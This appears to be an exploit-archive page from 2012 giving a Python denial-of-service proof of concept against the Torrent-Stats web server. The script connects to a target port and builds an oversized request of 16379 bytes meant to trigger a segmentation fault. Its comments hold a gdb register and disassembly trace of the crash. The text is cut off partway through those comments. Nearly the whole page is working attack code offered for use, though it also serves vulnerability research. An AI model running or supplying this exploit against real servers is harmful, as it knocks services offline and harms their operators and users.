Home / exploits Torrent-Stats Denial Of Service
Posted on 04 February 2012
#!/usr/bin/python import socket, urllib, sys host = 'localhost' port = 8080 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(8) print 'Sending GET request' # size = sys.argv[1] # Crash at A * 16378 size = 16379 # DOS #1: gdb trace for buffer1 #Program received signal SIGSEGV, Segmentation fault. #--------------------------------------------------------------------------[regs] # EAX: 0x00000000 EBX: 0x08051258 ECX: 0x00000000 EDX: 0x20202020 o d I t s Z a P c # ESI: 0x080537BC EDI: 0x080537B8 EBP: 0xBFFFF2E8 ESP: 0xBFFFF2B0 EIP: 0x0804AF72 # CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B #--------------------------------------------------------------------------[code] #=> 0x804af72 <httpd_content_handler+306>: movb $0x0,(%eax) # 0x804af75 <httpd_content_handler+309>: mov 0x20(%ebx),%edx # 0x804af78 <httpd_content_handler+312>: add $0x1,%eax # 0x804af7b <httpd_content_handler+315>: mov %eax,(%edx) # 0x804af7d <httpd_content_handler+317>: mov -0x1c(%ebp),%eax # 0x804af80 <httpd_content_handler+320>: movzbl 0x1(%eax),%edx # 0x804af84 <httpd_content_handler+324>: test %dl,%dl # 0x804af86 <httpd_content_handler+326>: je 0x804b12e <httpd_content_handler+750> #-------------------------------------------------------------------------------- #parse_args (fd=0x9, privdata=0x8051258) at httpd.c:106 #106 *tmp++ = '